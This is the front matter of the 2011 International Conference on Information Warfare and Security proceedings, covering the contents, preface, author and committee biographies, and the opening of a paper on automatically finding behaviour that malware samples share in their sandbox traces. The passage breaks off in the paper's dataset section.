The Proceedings<br />
of the<br />
6th International<br />
Conference on Information<br />
Warfare and Security<br />
The George Washington University,<br />
Washington, DC, USA<br />
17-18 March 2011<br />
Edited by<br />
Leigh Armistead<br />
Edith Cowan University<br />
Programme Chair
Copyright The Authors, 2011. All Rights Reserved.<br />
No reproduction, copy or transmission may be made without written permission from the individual authors.<br />
Papers have been double-blind peer reviewed before final submission to the conference. Initially, paper<br />
abstracts were read and selected by the conference panel for submission as possible papers for the<br />
conference.<br />
Many thanks to the reviewers who helped ensure the quality of the full papers.<br />
These Conference Proceedings have been submitted to Thomson ISI for indexing.<br />
Further copies of this book and previous years’ proceedings can be purchased from http://academicconferences.org/2-proceedings.htm<br />
ISBN: 978-1-906638-92-4 (Book)<br />
Published by Academic Publishing International Limited<br />
Reading<br />
UK<br />
+44-118-972-4148<br />
www.academic-publishing.org
Contents<br />
Paper Title – Author(s) – Page<br />
Preface – iii<br />
Biographies of Conference Chairs, Programme Chair, Keynote Speaker and Mini-track Chairs – iv<br />
Biographies of contributing authors – v<br />
Using the Longest Common Substring on Dynamic Traces of Malware to Automatically Identify Common Behaviors – Jaime Acosta – 1<br />
Modeling and Justification of the Store and Forward Protocol: Covert Channel Analysis – Hind Al Falasi and Liren Zhang – 8<br />
The Evolution of Information Assurance (IA) and Information Operations (IO) Contracts across the DoD: Growth Opportunities for Academic Research – an Update – Edwin Leigh Armistead and Thomas Murphy – 14<br />
The Uses and Limits of Game Theory in Conceptualizing Cyberwarfare – Merritt Baer – 23<br />
Who Needs a Botnet if you Have Google? – Ivan Burke and Renier van Heerden – 32<br />
Mission Resilience in Cloud Computing: A Biologically Inspired Approach – Marco Carvalho, Dipankar Dasgupta, Michael Grimaila and Carlos Perez – 42<br />
Link Analysis and Link Visualization of Malicious Websites – Manoj Cherukuri and Srinivas Mukkamala – 52<br />
The Strategies for Critical Cyber Infrastructure (CCI) Protection by Enhancing Software Assurance – Mecealus Cronkrite, John Szydlik and Joon Park – 68<br />
Building an Improved Taxonomy for IA Education Resources in PRISM – Vincent Garramone and Daniel Likarish – 76<br />
Using Dynamic Addressing for a Moving Target Defense – Stephen Groat, Matthew Dunlop, Randy Marchany and Joseph Tront – 84<br />
Changing the Face of Cyber Warfare with International Cyber Defense Collaboration – Marthie Grobler, Joey Jansen van Vuuren and Jannie Zaaiman – 92<br />
Cyber Strategy and the Law of Armed Conflict – Ulf Haeussler – 99<br />
eGovernance and Strategic Information Warfare – non Military Approach – Karim Hamza and Van Dalen – 106<br />
Intelligence-Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains – Eric Hutchins, Michael Cloppert and Rohan Amin – 113<br />
The Hidden Grand Narrative of Western Military Policy: A Linguistic Analysis of American Strategic Communication – Saara Jantunen and Aki-Mauri Huhtinen – 126<br />
Host-Based Data Exfiltration Detection via System Call Sequences – Brian Jewell and Justin Beaver – 134<br />
Detection of YASS Using Calibration by Motion Estimation – Kesav Kancherla and Srinivas Mukkamala – 143<br />
Developing a Knowledge System for Information Operations – Louise Leenen, Ronell Alberts, Katarina Britz, Aurona Gerber and Thomas Meyer – 151<br />
CAESMA – An On-Going Proposal of a Network Forensic Model for VoIP traffic – Jose Mas y Rubi, Christian Del Carpio, Javier Espinoza and Oscar Nuñez Mori – 160<br />
Secure Proactive Recovery – a Hardware Based Mission Assurance Scheme – Ruchika Mehresh, Shambhu Upadhyaya and Kevin Kwiat – 171<br />
Identifying Cyber Espionage: Towards a Synthesis Approach – David Merritt and Barry Mullins – 180<br />
Security Analysis of Webservers of Prominent Organizations in Pakistan – Muhammad Naveed – 188<br />
International Legal Issues and Approaches Regarding Information Warfare – Alexandru Nitu – 200<br />
Cyberwarfare and Anonymity – Christopher Perr – 207<br />
Catch Me If You Can: Cyber Anonymity – David Rohret and Michael Kraft – 213<br />
Neutrality in the Context of Cyberwar – Julie Ryan and Daniel Ryan – 221<br />
Labelling: Security in Information Management and Sharing – Harm Schotanus, Tim Hartog, Hiddo Hut and Daniel Boonstra – 228<br />
Information Management Security for Inter-Organisational Business Processes, Services and Collaboration – Maria Th. Semmelrock-Picej, Alfred Possegger and Andreas Stopper – 238<br />
Anatomy of Banking Trojans – Zeus Crimeware (how Similar are its Variants) – Madhu Shankarapani and Srinivas Mukkamala – 252<br />
Terrorist use of the Internet: Exploitation and Support Through ICT Infrastructure – Namosha Veerasamy and Marthie Grobler – 260<br />
Evolving an Information Security Curriculum: New Content, Innovative Pedagogy and Flexible Delivery Formats – Tanya Zlateva, Virginia Greiman, Lou Chitkushev and Kip Becker – 268<br />
Research in Progress Papers – 277<br />
Towards Persistent Control over Shared Information in a Collaborative Environment – Shada Alsalamah, Alex Gray and Jeremy Hilton – 279<br />
3D Execution Monitor (3D-EM): Using 3D Circuits to Detect Hardware Malicious Inclusions in General Purpose Processors – Michael Bilzor – 289<br />
Towards An Intelligent Software Agent System As Defense Against Botnets – Evan Dembskey and Elmarie Biermann – 299<br />
Theoretical Offensive Cyber Militia Models – Rain Ottis – 308<br />
Work in Progress – 315<br />
Large-scale analysis of continuous data in cyber-warfare threat detection – William Acosta – 317<br />
A System and Method for Designing Secure Client-Server Communication Protocols Based on Certificateless PKI – Natarajan Vijayarangan – 320<br />
Preface<br />
These Proceedings are the work of researchers contributing to the 6th International Conference on<br />
Information Warfare and Security (ICIW 2011), hosted this year by the George Washington University,<br />
Washington DC, USA. The Conference Chair is Dr. Julie Ryan from the George Washington University,<br />
Washington, DC, USA and I am again the Programme Chair.<br />
The opening keynote address this year is given by Matthew A. Stern, General Dynamics Advanced<br />
Information Systems, USA. The second day will be opened by Mathew “Pete” Peterson from the Naval<br />
Criminal Investigative Service, USA.<br />
An important benefit of attending this conference is the ability to share ideas and meet the people who hold<br />
them. The range of papers will ensure an interesting and enlightening discussion over the two-day schedule.<br />
The topics covered by the papers this year illustrate the depth of the information operations research area,<br />
with the subject matter ranging from the highly technical to the more strategic visions of the use and<br />
influence of information.<br />
From an initial submission of 97 abstracts, 38 papers were accepted through the double-blind peer review<br />
process and are published in these Conference Proceedings, including contributions from Austria,<br />
Bangladesh, Estonia, Finland, India, Iran, Pakistan, Peru, Romania, South Africa, the Netherlands, the<br />
United Arab Emirates, the United Kingdom and the United States.<br />
I wish you a most enjoyable conference.<br />
March 2011<br />
Leigh Armistead<br />
Edith Cowan University<br />
Programme Chair<br />
Biographies of Conference Chairs, Programme Chairs and Keynote<br />
Speakers<br />
Conference Chair<br />
Dr. Julie Ryan currently teaches and directs research in Information Assurance at<br />
The George Washington University. Prior to joining academia, she worked in various<br />
positions in industry and government. Her degrees are from the US Air Force<br />
Academy, Eastern Michigan University, and The George Washington University.<br />
Programme Chair<br />
Dr Edwin “Leigh” Armistead is the Director of Business Development for Goldbelt<br />
Hawk LLC, the Programme Chair for the International Conference on Information<br />
Warfare and an Adjunct Lecturer at Edith Cowan University in Perth, Australia. He<br />
has written nine books and 18 journal articles, presented 17 academic papers and served<br />
as a Chairman for 16 professional and academic conferences. Formerly a Master<br />
Faculty member at the Joint Forces Staff College, Leigh received his PhD from Edith Cowan<br />
University with an emphasis on Information Operations. He also serves as a Co-Editor<br />
of the Journal of Information Warfare and on the Editorial Review Board of the<br />
European Conference on Information Warfare.<br />
Keynote Speakers<br />
Mathew “Pete” Peterson has served in a variety of positions within US government<br />
agencies since 1989, including 13 years on active duty in the U.S. Army. He has<br />
experience in a wide range of domains, including information assurance/information<br />
protection, research, development & acquisition (RDA)/research & technology<br />
protection (RTP), cyber analysis issues, critical infrastructure protection, and threat<br />
analysis. He currently serves as Cyber Analysis Division Chief within the Naval<br />
Criminal Investigative Service, while working towards completion of his dissertation in<br />
the Executive Leadership Doctoral Program at George Washington University’s Virginia<br />
Campus.<br />
Matthew Stern is the director of cyber accounts for General Dynamics Advanced Information Systems. He<br />
also provides subject matter expertise in cyberspace operations to the company and its customers. Stern<br />
also represents the company on several boards and advisory groups, providing thought leadership to the<br />
cyber security community. He spent 22 years in positions of increasing responsibility in the U.S. Army,<br />
culminating with command of 2nd Battalion, 1st Information Operations Command and the Army Computer<br />
Emergency Response Team (ACERT), the first unit in U.S. Army history dedicated to cyberspace<br />
operations. Stern is an established expert on information technology, network security, information<br />
operations and special information operations, and a recognized visionary regarding the military<br />
conduct of cyberspace operations. He has developed his knowledge and expertise through practical<br />
experience leading his command, the U.S. military data communication services in Iraq, support to the<br />
technical architecture of the U.S. Army’s digitized Armored Corps, and the systems integration for the Land<br />
Information Warfare Activity Information Dominance Center. Stern is also a decorated combat veteran of<br />
Operations DESERT SHIELD/STORM and IRAQI FREEDOM. Matt holds a Master’s degree in Information<br />
Systems and Computer Resource Management from Webster University and a Bachelor of Science degree<br />
in Political Science from Northern Illinois University.<br />
Biographies of contributing authors (in alphabetical order)<br />
Jaime Acosta completed his Ph.D. in Computer Science at the University of Texas at El Paso. Dr. Acosta’s<br />
research has received awards and recognition including the outstanding dissertation award by the University<br />
of Texas at El Paso. Jaime is currently working at the United States Army Research Laboratory conducting<br />
security research.<br />
William Acosta, Ph.D. received his Ph.D. from the University of Notre Dame in 2008 and is currently an<br />
assistant professor at the University of Toledo teaching in the Computer Science and Engineering<br />
Technology Program. His prior work included peer-to-peer search and distributed systems. He is currently<br />
working on experimental data systems research focusing on large-scale data analysis.<br />
Hind Al Falasi is currently pursuing a PhD in Information Security at the United Arab Emirates University, Al<br />
Ain, UAE, and received a Bachelor of Science in Information Security from the same university. The main<br />
focus of this research is the security of vehicular ad hoc networks.<br />
Rohan Amin is a member of Lockheed Martin's CIRT, who helped grow the team from 5 charter members<br />
with limited responsibilities to an industry-leading entity with global scope. His contributions to the team have<br />
ranged from deeply technical to broadly organizational.<br />
Shada Al-Salamah is a doctoral candidate at the Department of Computer Science & Informatics, Cardiff<br />
University, UK. She received her MSc in Strategic Information Systems with Information Assurance from<br />
Cardiff University and received a BSc in Information Technology from the College of Computer and<br />
Information Sciences, King Saud University, Riyadh, Saudi Arabia.<br />
Merritt Baer is a graduate of Harvard Law School and Harvard College. She has conducted clinical cyberlaw<br />
research at Harvard's Berkman Center for Internet and Society and has published a number of pieces at the<br />
intersection of cybercrime, Constitutional Internet issues and national security. She currently serves as a<br />
judicial clerk at the United States Court of Appeals for the Armed Forces.<br />
Michael Bilzor is a PhD student at the Naval Postgraduate School. He has a B.S. in Computer Science from<br />
the U.S. Naval Academy and an M.S. in Computer Science from Johns Hopkins University. He served in F-<br />
14 and F/A-18 squadrons as a Naval Flight Officer until 2005. His research interest is in hardware security.<br />
Ivan Burke is an MSc student in the Department of Computer Science at the University of Pretoria, South<br />
Africa. He also works full time at the Council for Scientific and Industrial Research, South Africa, in the<br />
department of Defence, Peace, Safety and Security, where he works within the Command, Control and<br />
Information Warfare research group.<br />
Marco Carvalho is a Research Scientist at the Florida Institute for Human and Machine Cognition (IHMC). He<br />
received his Ph.D. from Tulane University, New Orleans, following a M.Sc. in Computer Science from<br />
University of West Florida, a M.Sc. in Mechanical Engineering from Federal University of Brasilia (UnB), and<br />
a B.Sc. in Mechanical Engineering, also from UnB. His research interests are primarily in the areas of<br />
biologically inspired security and tactical networks.<br />
Mecealus Cronkrite is studying for an M.S. in Information & Security Management at Syracuse University<br />
School of Information Studies. He is a DHS Career Development Grant fellow and a Graduate Engineering<br />
Minority (GEM) fellow. He gained a B.S. degree in Computer Science in 2009 from the State University at<br />
Brockport, NY. He has spent 7 years in industry in systems integration programming and analysis, and IT<br />
disaster management roles.<br />
Mike Cloppert is a member of Lockheed Martin's CIRT, who helped grow the team from 5 charter members<br />
with limited responsibilities to an industry-leading entity with global scope. His contributions to the team have<br />
ranged from deeply technical to broadly organizational.<br />
Evan Dembskey is a senior lecturer at UNISA in Pretoria, South Africa. He currently lectures in the area of<br />
computer security. His research interests include IW and technology and science in Ancient Greece and<br />
Rome.<br />
Javier Espinoza was born in Lima, Peru, in August 1971. He studied Electronic Engineering at Pontificia<br />
Universidad Catolica del Peru and completed specialized training in Cisco Certified Network Associate<br />
(CCNA), structured wiring and information system security. Javier is studying for a Master’s degree in<br />
Telecommunications Engineering at Pontificia Universidad Catolica del Peru in Lima, Peru.<br />
Stephen Groat is a PhD student at Virginia Tech in the Bradley Department of Electrical and Computer<br />
Engineering focusing on network security and IPv6. Working in coordination with the Information Technology<br />
Security Office and Lab, Stephen is researching the security implications of IPv6.<br />
Ulf Haeussler is a Legal Advisor in the German Armed Forces and currently seconded to HQ SACT. Prior<br />
to this assignment, Ulf served in multiple German Armed Forces positions as well as at NATO HQ, and was<br />
deployed to NATO operations as a reservist on active duty. Ulf is widely published on international law.<br />
Karim Hamza works as an Academic Researcher at the Maastricht School of Management (Netherlands), a<br />
Part Time Professor at the American University (Egypt) and Approved Tutor for Edinburgh Business School<br />
(UK). Additionally, he works as a Business Development Manager in one of the leading information<br />
technology companies specialized in Enterprise Resource Planning applications for governments and private<br />
sectors.<br />
Tim Hartog graduated in 2005 from the Technical University of Twente in the Netherlands. Since then he has<br />
been active in the field of Information Security. During his work at TNO, the Dutch Organization for Applied<br />
Scientific Research, Tim has been working in the areas of Trusted Computing, Trusted Operating Systems<br />
and Cross Domain Solutions.<br />
Saara Jantunen studies leadership as a doctoral student at the Finnish Defence University. She has studied<br />
English language and culture at the University of Groningen in the Netherlands and English philology at the<br />
University of Helsinki, Finland. Her research interests include language & identity and military discourse.<br />
Jantunen currently works in education.<br />
Brian Jewell is a graduate student with an emphasis on Information Security at Tennessee Technological<br />
University. He received his B.S. in Computer Science from Murray State University. During summer 2010 he<br />
interned at Oak Ridge National Laboratory in the Applied Software Engineering Research group. His<br />
research is in the area of host intrusion detection and response.<br />
Louise Leenen is a Senior Researcher at the South African Council for Scientific and Industrial Research in<br />
the Defence, Peace, Safety and Security (DPSS) unit which focuses on defence related research and<br />
development. She holds a PhD in Computer Science from the University of Wollongong in Australia.<br />
Dan Likarish is a Director of the Center on Information Assurance Studies and faculty at Regis University<br />
School of Information and Computer Science. For many years he has been the advisor for undergraduate<br />
and graduate students with an interest in IS and IT problems. His research interests are in rapid curriculum<br />
development and deployment in conjunction with virtual worlds.<br />
Jose Luis Mas y Rubi studied Systems Engineering at the Instituto Universitario Politecnico Santiago<br />
Mariño in Barcelona, Venezuela. He has a Cisco CCNA certification in networking. He is currently studying<br />
for a Telecommunications Engineering Master degree at Pontificia Universidad Catolica del Peru in Lima,<br />
Peru.<br />
Ruchika Mehresh is a doctoral student of Computer Science and Engineering at the State University of New<br />
York at Buffalo. Her research focuses on reliability and security in fault-tolerant computing. She has worked<br />
on research projects funded by the U.S. Air Force Research Laboratory.<br />
David Merritt received his B.S. in computer engineering from the U.S. Air Force Academy. He is an<br />
Undergraduate Network Warfare Training graduate, holds CISSP and GSEC certifications, and spent 3 years<br />
on the Air Force Computer Emergency Response Team. David is an active duty officer attending the Air<br />
Force Institute of Technology in Ohio.<br />
Srinivas Mukkamala is a senior research scientist with ICASA (Institute for Complex Additive Systems<br />
Analysis), Adjunct Faculty of Computer Science Department of New Mexico Tech, advisor Cyber Security<br />
Works, and co-founder/managing partner of CAaNES LLC. He received his Ph.D. from New Mexico Tech in<br />
2005. He is a frequent speaker on information assurance in conferences and tutorials across the world.<br />
Muhammad Naveed completed a B.Sc. degree in Electrical Engineering (with a major in communication) at<br />
the University of Engineering and Technology (UET), Peshawar, Pakistan, in 2010. He is currently a lecturer<br />
in the Department of Computer Science, IQRA University, Peshawar, Pakistan. His research interests include<br />
information security and cryptography.<br />
Alexandru Nitu is a legal counselor at the Romanian Intelligence Service, with nine years of experience in<br />
matters regarding human rights protection. He is involved in legal studies referring to the impact of the<br />
intelligence activities on respecting citizens’ fundamental rights and liberties.<br />
Rain Ottis is a scientist at the Cooperative Cyber Defence Centre of Excellence. He is a graduate of the<br />
United States Military Academy and Tallinn University of Technology (MSc, Informatics). He continues his<br />
studies at a PhD program in Tallinn University of Technology, where he focuses on politically motivated<br />
cyber attack campaigns by non-state actors.<br />
Christopher Perr is currently a PhD candidate at Auburn University studying computer and network security.<br />
He holds a B.S. in Computer Science from the Air Force Academy and a Masters of Software Engineering<br />
from Auburn University.<br />
David Rohret works for CSC, Inc. at the Joint Information Operations Warfare Center (JIOWC). For over<br />
fifteen years he has pursued network security interests, including developing and vetting exploits for use on<br />
established red teams and in adversarial research. He holds degrees in Computer Science from the<br />
University of Iowa and La Salle University.<br />
Shambhu Upadhyaya is Professor of Computer Science and Engineering at the State University of New<br />
York at Buffalo. His research interests are computer security, information assurance, fault-tolerant<br />
computing, distributed systems and reliability. His research has been funded by federal agencies such as<br />
National Science Foundation, U.S. Air Force Research Laboratory, DARPA, National Security Agency and<br />
industries such as IBM, Intel, Cisco and Harris Corporation.<br />
Namosha Veerasamy obtained a BSc:IT Computer Science Degree, and both a BSc: Computer Science<br />
(Honours Degree) and MSc: Computer Science with distinction from the University of Pretoria. She is<br />
currently employed as a researcher at the Council for Scientific and Industrial Research (CSIR) in Pretoria.<br />
Namosha is also qualified as a Certified Information System Security Professional (CISSP).<br />
Natarajan Vijayarangan is a senior scientist at TCS. He obtained his Ph.D. in Mathematics in 2001 from<br />
RIASM, University of Madras. He received 'Best Research Paper Award' of Ramanujan Mathematical<br />
Society in 2000. He has published patents, papers and books in the field of Information Security. He has<br />
participated in the NIST SHA-3 competition and received the 'AIP Anchor Award'.<br />
Jannie Zaaiman (B Comm, B Proc, HBA, MBA, PhD) is Deputy Vice Chancellor: Operations at the<br />
University of Venda, and is the former Executive Dean, Faculty of Information and Communication<br />
Technology at the Tshwane University of Technology (TUT). Before joining TUT, Jannie was Group<br />
Company Secretary of Sasol, Managing Executive: Outsourcing and Divestitures at Telkom and Group<br />
Manager at Development Bank of Southern Africa.<br />
Tanya Zlateva completed her doctorate at the Dresden University of Technology, Germany, and<br />
postdoctoral training at the Harvard-MIT Division for Health Sciences and Technology. Her research interests<br />
include application level security, biometrics, and new educational technologies. She currently serves as<br />
director of Boston University's Center for Reliable Information Systems and Cyber Security.<br />
Conference Executive:<br />
Michael Grimaila, Center for Cyberspace Research, WPAFB, Ohio, USA<br />
Dorothy Denning, Naval Postgraduate School, Monterey, CA, USA<br />
Doug Webster, MITRE Corporation - United States Strategic Command's Global Innovation & Strategy<br />
Center<br />
Kevin Streff, Dakota State University, USA<br />
Andy Jones, Security Research Centre, British Telecom, UK and Khalifa University, UAE<br />
William Mahoney, University of Nebraska Omaha, Omaha, USA<br />
Dan Kuehl, National Defense University, Washington DC, USA<br />
Corey Schou, Idaho State University, USA<br />
Committee Members:<br />
The conference programme committee consists of key people in the information systems, information<br />
warfare and information security communities around the world. The following people have confirmed their<br />
participation:<br />
Jim Alves-Foss (University of Idaho, USA); Todd Andel (Air Force Institute of Technology, USA); Leigh<br />
Armistead (Edith Cowan University, Australia); Johnnes Arreymbi (University of East London, UK); Rusty<br />
Baldwin (Air Force Institute of Technology, USA); Richard Baskerville (Georgia State University, USA); Allan<br />
Berg (Critical Infrastructure and Cyber Protection Center, Capitol College, USA); Sviatoslav Braynov<br />
(University of Illinois, USA); Blaine Burnham (University of Nebraska, Omaha, USA); Catharina Candolin<br />
(Finnish Defence Forces, Helsinki, Finland); Rodney Clare (EDS and the Open University, UK); Nathan<br />
Clarke (University of Plymouth, UK); Geoffrey Darnton (University of Bournemouth, UK); Dipankar Dasgupta<br />
(Intelligent Security Systems, USA); Dorothy Denning (Naval Postgraduate School, USA); Glenn Dietrich<br />
(University of Texas, USA); David Fahrenkrug (US Air Force, USA); Kevin Gleason (KMG Consulting, MA,<br />
USA); Sanjay Goel (University at Albany, USA); Michael Grimaila (Air Force Institute of Technology, Ohio,<br />
USA); Daniel Grosu (Wayne State University, USA); Drew Hamilton (Auburn University, USA); Dwight<br />
Haworth (University of Nebraska at Omaha, USA); Philip Hippensteel (Penn State University, USA); Jeffrey<br />
Humphries (Air Force Institute of Technology, USA); Bill Hutchinson (Edith Cowan University, Australia);<br />
Berg P Hyacinthe (Assas School of Law, Universite Paris, France); Andy Jones (British Telecom, UK);<br />
James Joshi (University of Pittsburgh, USA); Leonard Kabeya Mukeba (Kigali Institute of Science and<br />
Technology, Rwanda); Prashant Krishnamurthy (University of Pittsburgh, USA); Dan Kuehl (National<br />
Defense University, USA); Stuart Kurkowski (Air Force Institute of Technology, USA); Takakazu Kurokawa<br />
(National Defense Academy, Japan); Rauno Kuusisto (National Defence College, Finland); Tuija Kuusisto<br />
(Internal Security ICT Agency, Finland); Arun Lakhotia (University of Louisiana Lafayette, USA); Sam Liles<br />
(Purdue University Calumet, USA); Cherie Long (Clayton State University, Decatur, USA); Brian Lopez<br />
(Lawrence Livermore National Laboratory, USA); Juan Lopez (Air Force Institute of Technology, USA); Bin Lu<br />
(West Chester University, USA); Bill Mahoney (University of Nebraska, USA); John McCarthy<br />
(Buckinghamshire and Chiltern University College, UK); J Todd McDonald (Air Force Institute of Technology,<br />
USA); Robert Mills (Air Force Institute of Technology, Ohio, USA); Don Milne (Buckinghamshire and Chiltern<br />
University College, UK); Srinivas Mukkamala (New Mexico Tech, Socorro, USA); Barry Mullins (Air Force<br />
Institute of Technology, USA); Andrea Perego (Università degli Studi dell’Insubria, Italy); Gilbert Patterson<br />
(Air Force Institute of Technology, USA); Richard Raines (Air Force Institute of Technology, USA); Ken Revett<br />
(University of Westminster, UK); Neil Rowe (US Naval Postgraduate School, USA); Julie Ryan (George<br />
Washington University, USA); Corey Schou (Idaho State University, USA); Dan Shoemaker (University of<br />
Detroit Mercy, USA); William Sousan (University of Nebraska, Omaha, USA); Kevin Streff (Dakota State<br />
University, USA); Dennis Strouble (Air Force Institute of Technology, USA); Eric Trias (Air Force Institute of<br />
Technology, USA); Doug Twitchell (Illinois State University, USA); Renier van Heerden (CSIR, Pretoria,<br />
South Africa); Stylianos Vidalis (Newport Business School, UK); Fahad Waseem (University of Northumbria,<br />
UK); Kenneth Webb (Edith Cowan University, Australia); Douglas Webster (USSTRATCOM Global<br />
Innovation & Strategy Center, USA); Zehai Zhou (Dakota State University, USA).<br />
Using the Longest Common Substring on Dynamic Traces<br />
of Malware to Automatically Identify Common Behaviors<br />
Jaime Acosta<br />
Army Research Laboratory, White Sands, NM, USA<br />
jaime.acosta1@us.army.mil<br />
Abstract: A large amount of research is focused on identifying malware. Once identified, the behavior of the<br />
malware must be analyzed to determine its effects on a system. This can be done by tracing through a malware<br />
binary using a disassembler or logging its dynamic behavior using a sandbox (virtual machines that execute a<br />
binary and log all dynamic events such as network, registry, and file manipulations). However, even with these<br />
tools, analyzing malware behavior is very time consuming for an analyst. In order to alleviate this, recent work<br />
has identified methods to categorize malware into “clusters” or types based on common dynamic behavior. This<br />
allows a human analyst to look at only a fraction of malware instances–those most dissimilar. Still missing are<br />
techniques that identify similar behaviors among malware of different types. Also missing is a way to<br />
automatically identify differences among same-type malware instances to determine whether the differences are<br />
benign or are the key malicious behavior. The research presented here shows that a wide collection of malware<br />
instances have common dynamic behavior regardless of their type. This is a first step toward enabling an analyst<br />
to more efficiently identify malware instances’ effects on systems by reducing the need for redundant analysis<br />
and allowing filtration of common benign behavior. This research uses the publicly available Reference Data Set<br />
that was collected over a period of three years. Malware instances were identified and assigned a type by six<br />
anti-malware scanners. The dataset consists of dynamic trace events of 3131 malware instances generated by<br />
CWSandbox. For this research, the dataset is separated into two sets: small and large. The small set contains<br />
2071 instances of malware that are less than 100 KB in size. The large set contains 1060 instances of malware<br />
that are between 100 KB and 3.4 MB in size. In order to measure the common behavior between the small and<br />
large sets, common sequential event sequences within each malware instance in the small set are identified<br />
using a modified version of the longest common substring algorithm. Once identified, all appearances of these<br />
common event sequences are removed from the large set to determine shared behavior. Most common sequences are between 2 and 60 events in length. Results indicate that, on average, the large-set instances share 96% of event sequences when sequences of length 2 and higher are used, 66% with sequences of length 6 and higher, and 50% with sequences of length 12 and higher. This indicates that an analyst's workload
can be largely reduced by removing common behavior sequences. Furthermore, it shows that malware instances<br />
may not always fall into exclusive categories. It may be more beneficial to instead identify behaviors and map<br />
them to malware instances, for example, as with the Malware Attribute Enumeration and Characterization<br />
(MAEC). Future efforts may look into attaching semantic labels on long sequences that are common to many<br />
malware instances in order to aid the analyst further.<br />
Keywords: malware, similarity, dynamic, analysis, substring<br />
1. Introduction<br />
As the number of malware instances grows each year, there is a need for automated methods that<br />
can efficiently identify, classify, and reduce the amount of data that an analyst has to review pertaining<br />
to malware. This paper focuses on identifying similarities among known malware instances in order to<br />
reduce an analyst’s workload.<br />
Automatic malware detection has been researched extensively in the past (Vinod et al., 2009). When<br />
malware is identified, it is assigned a type or name. The malware binary's behavior is analyzed in detail in order to provide alerts, recover data, and assess damage, among other purposes. Recently, there have been
two main approaches to accomplish this: static and dynamic analysis. In static analysis, the malware<br />
binary is reverse engineered using a disassembler. This method can be very time consuming,<br />
especially due to obfuscation techniques such as polymorphism (Kasina et al., 2010), metamorphism<br />
(Lee et al., 2010), memory packing (Han et al., 2010), and virtualization (Sharif et al., 2009). Dynamic<br />
analysis, on the other hand, involves running the malware binary in a controlled environment known as
a sandbox, e.g., Norman (Norman Solutions, 2003), Anubis (Bayer et al., 2006), CWSandbox<br />
(Willems et al., 2007), where every event during the malware’s execution is logged to an event trace.<br />
State-of-the-art sandboxes have the ability to fast-forward time to elicit delayed malware execution<br />
and can even simulate user interaction. Current techniques, e.g., (Rieck et al., 2010), use clustering<br />
methods in order to group similar malware based on their events during runtime, but still require<br />
manual analysis to identify specific similarities and differences.<br />
The research presented here uses a dataset that consists of sandbox event traces of 3131 malware<br />
instances. Manual observation of the dataset revealed many behavior patterns shared across many instances, such as file replacements (which involve a series of system calls), that at first glance seem complex and overwhelming but were made simple by replacing these common behaviors with short annotations. This paper is a step toward automating this process.
The following are the contributions resulting from the work described in this paper.
This research provides a methodology showing how the longest common substring algorithm can be modified to conduct similarity analysis on malware using dynamic event traces. This similarity may be due to code reuse, which arises from legitimate third-party libraries and also from reusing infected or malicious code.
Use of this algorithm shows that in this dataset of malware, even though the instances are of different types (assigned by anti-virus programs), there are a large number of common behaviors. This suggests that malware authors reuse code and that an analyst could exploit this to eliminate duplicate processing.
This research shows that the common behaviors identified are not limited to short, trivial event sequences; there are many long sequences. This indicates that it may be possible to replace semantically rich events with natural-language annotations to facilitate analysis.
2. Related work<br />
Because of the large number of new malware instances introduced each year, there has been a large amount of work to aid in each stage of the malware analysis workflow.
The first step in analysis is data collection. Tools that aid in this collection include Nepenthes<br />
(Baecher et al., 2006), Amun (Göbel, 2009), and HoneyPots (Provos, 2004). After collection, the<br />
malware instances are analyzed using static (source code) or dynamic (event traces) techniques. In<br />
the past decade there have been a wide variety of techniques used for static and dynamic analysis of<br />
legitimate source code, with the goal of exploiting program semantics in an efficient way (Cornelissen,<br />
2009). Related to malware, there have been many techniques that exploit characteristics unique to<br />
malware, including malicious behavior, small program size, and code reuse among instances.<br />
In both static and dynamic analysis techniques, one method that has had recent attention is using<br />
machine learning to cluster similar malware instances. Clustering methods are useful because they<br />
generalize large sets of malware into categories with limited need for manual human intervention.<br />
Jang and Brumley (2009) perform static analysis, identifying areas of code reuse by clustering malware binaries. Their clustering method uses Bloom filters, which identify similarity of malware instances by applying hashing techniques to fixed-size chunks of the malware executable code.
On the other hand, Bayer et al. (2009) use machine learning algorithms to identify similarities in<br />
malware instances by comparing their dynamic event traces, which include system calls, their<br />
dependencies, and network behavior. Next, the malware instances are clustered based on their<br />
dynamic behavior. A limitation of this approach is that the algorithm is trained with a fixed set of<br />
malware. It does not allow retraining with additional malware samples during the clustering phase.<br />
Rieck extends this with his Malheur (Rieck et al., 2010) system by establishing an iterative<br />
mechanism that consists of clustering and then classifying new instances into existing clusters. In his<br />
work, similarity is determined by the presence of shared fixed-length instruction sequences. In<br />
addition, Rieck also uses a dynamic trace representation format called MIST (Trinius et al., 2010) that<br />
allows prioritization of event parameters (e.g., an openfile system call may have the file name, file<br />
type, and the file path as parameters). This is meant to allow more efficient processing for machine<br />
learning algorithms by reducing the input file size through leaving out less-critical parameters. MIST also provides a common file format to which the output of many available sandboxes can be converted.
After the instances are clustered, an analyst may have to conduct deeper investigation, such as determining exact differences and similarities between the binaries. It may be the case that malware in different clusters share common behaviors, which results in redundant analysis by a human analyst. Another issue is that instances in a cluster are not exactly the same; there may be malicious behavior that is unique to one instance within a cluster. One way to alleviate these issues is to develop techniques that, instead of determining similarity using fixed-size sequences as in previous work, are not tied to sequence length and automatically detect variable-sized, semantically representative sequences.
Some techniques that use semantic structure for finding similarity are in code-clone detection<br />
research. These techniques have been used to identify redundancy to reduce program size or to<br />
identify plagiarism in legitimate software (Roy and Cordy, 2007). The problem with using these
techniques for identifying similarity and differences in malware is that the source code of malware is<br />
not available. Some attempts have been made to analyze the sequences of instructions of<br />
disassembled binaries to determine whether they are malicious. One method compared the<br />
disassembled code against behavior templates that are known to exist in malware. These templates<br />
are able to capture malicious behavior, even if the malware has small variation (Christodorescu et al.,<br />
2005). Another method (Ye et al., 2007) uses the Intelligent Malware Detection System (IMDS) to identify malware instances by checking whether certain sequences of Application Programming Interface (API) calls exist in a binary Portable Executable (PE) file. A limitation of both of these examples is that
they assume the binary file is not packed and is not virtualized.<br />
In this paper the longest common substring algorithm is modified and used to identify common event<br />
sequences of varying size among a set of malware. Also, the algorithm works on the dynamic traces<br />
of malware, which are evident even if the malware is packed or virtualized.<br />
3. Dataset<br />
3.1 Sandbox environment<br />
The dataset used for this research was obtained from the Malheur website (http://pi1.informatik.uni-mannheim.de/malheur/)
and was collected over a period of three years. In particular, the Reference<br />
dataset is used, which consists of the dynamic trace events of 3131 malware instances that are<br />
grouped into 24 types, as assigned by six anti-virus scanners. The dynamic traces of the malware<br />
instances were generated by CWSandbox. The event traces range in size from 700 B to 3.4 MB. The<br />
